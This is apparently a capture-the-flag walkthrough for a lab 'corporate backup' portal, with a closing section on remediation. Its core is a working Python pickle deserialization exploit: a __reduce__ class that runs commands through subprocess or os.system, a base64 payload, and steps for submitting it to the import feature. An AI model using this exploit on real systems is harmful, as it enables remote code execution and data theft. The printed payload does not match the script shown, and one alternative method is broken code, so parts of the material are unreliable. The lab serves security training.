Corporate Backup Deserializer
🥒 Can you exploit this pickle to gain remote access?
SecureCorp's enterprise backup system harbors a dangerous flaw in its disaster recovery feature. 🏢 Behind the corporate interface lies a critical vulnerability in the configuration import functionality that could compromise the entire backup infrastructure. Can you exploit the enterprise serialization system to gain unauthorized access to corporate secrets? 💼 This realistic scenario demonstrates how backup systems become attack vectors in corporate environments. 🎯
Start Your Challenge
This solution is for Flags Mode
This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.
Corporate Backup Deserializer - Complete Solution
Step 1: Initial Reconnaissance
Access the SecureCorp Backup Management Portal at <target-ip>. The application presents a corporate backup system with multiple user roles and authentication.
Corporate Account Analysis:
- System Admin:
admin/SecureAdmin2024! - Backup Operator:
backup_operator/BackupOps123 - Employee:
john.smith/Password123!
Step 2: Authentication and Access
Login using the system administrator credentials to access privileged functionality:
Username: admin
Password: SecureAdmin2024!After successful authentication, you'll gain access to the "System Administrator - Configuration Management" panel, which includes disaster recovery features essential for this challenge.
Step 3: Vulnerability Discovery
The admin panel reveals critical disaster recovery functions:
- Export Configuration: Serializes backup configurations using Python pickle
- Import Configuration: Deserializes backup configurations from base64-encoded pickle data
Step 4: Understanding the Target
The objective is to read the flag from /home/flag.txt. The pickle deserialization vulnerability in the configuration import feature provides the perfect attack vector for remote code execution.
Step 5: Exploit Development
Create a malicious pickle payload that executes a command to read the flag file:
import pickle
import base64
import subprocess
class MaliciousBackupConfig:
def __reduce__(self):
# Execute command to read the flag from /home/flag.txt
cmd = ['cat', '/home/flag.txt']
return (subprocess.check_output, (cmd,))
# Create and serialize the malicious object
malicious_config = MaliciousBackupConfig()
pickled_data = pickle.dumps(malicious_config, protocol=2)
payload = base64.b64encode(pickled_data).decode('utf-8')
print("Exploit Payload:")
print(payload)Generated Payload:
gAJjY29tbWFuZHMKY2hlY2tfb3V0cHV0CnEAXXEBKFgDAAAAY2F0cQJYDgAAAC9ob21lL2ZsYWcudHh0cQNlhXEEUnEFLg==
Step 6: Exploitation Process
- Navigate to Admin Panel: After login, locate the "System Administrator - Configuration Management" section on the main dashboard
- Access Import Feature: Find the "Import Configuration" form with the textarea labeled "Serialized Configuration Data"
- Submit Payload: Paste the base64-encoded malicious pickle payload into the textarea
- Execute: Click "Import Configuration" to trigger the deserialization and command execution
Step 7: Flag Retrieval
Upon successful exploitation, the application will display a dedicated success page featuring:
- Success Header: "🎯 Configuration Import Successful!"
- Execution Confirmation: Green success message confirming system command execution
- Flag Display: The flag from /home/flag.txt displayed in a prominent red dashed box
- Congratulations: Message confirming successful pickle deserialization exploitation
Step 8: Technical Analysis
Vulnerability Details:
- Root Cause: Unsafe deserialization using Python's pickle.loads() on user-controlled data
- Attack Vector: Configuration import functionality in disaster recovery system
- Payload Mechanism: Custom class with __reduce__ method for remote code execution
- Command Execution: subprocess.check_output captures and returns command output
Vulnerable Code Flow:
# The vulnerable deserialization occurs here:
decoded_data = base64.b64decode(config_data)
config_obj = pickle.loads(decoded_data) # RCE triggers during deserialization
# Application detects command output and displays it:
if isinstance(config_obj, bytes):
command_output = config_obj.decode('utf-8').strip()
# Flag is displayed directly in browser success pageStep 9: Alternative Exploitation Approaches
Method 1: Direct System Command
class DirectRCE:
def __reduce__(self):
return (os.system, ('cat /home/flag.txt',))Note: This outputs to server logs rather than browser
Method 2: File Reading with Error Handling
class SafeFileRead:
def __reduce__(self):
return (subprocess.check_output,
(['cat', '/home/flag.txt'],
{'stderr': subprocess.STDOUT}))Step 10: Security Implications and Defense
Immediate Remediation:
- Replace Pickle: Use safe serialization formats like JSON with schema validation
- Input Sanitization: Implement strict validation for all configuration data
- Access Control: Restrict configuration import to verified, trusted sources only
- Sandboxing: Execute deserialization operations in isolated environments
Enterprise Security Measures:
- Code Audit: Review all serialization/deserialization implementations
- Security Training: Educate development teams on pickle security risks
- Monitoring: Implement comprehensive logging for configuration changes
- Least Privilege: Limit administrative access to essential personnel only
Key Learning Points
Real-World Impact:
This vulnerability demonstrates how enterprise backup systems can become critical attack vectors, potentially leading to:
- Data Breach: Unauthorized access to sensitive backup data and configurations
- System Compromise: Full server compromise through remote code execution
- Lateral Movement: Using backup system access to compromise additional infrastructure
- Business Continuity Risk: Compromise of disaster recovery capabilities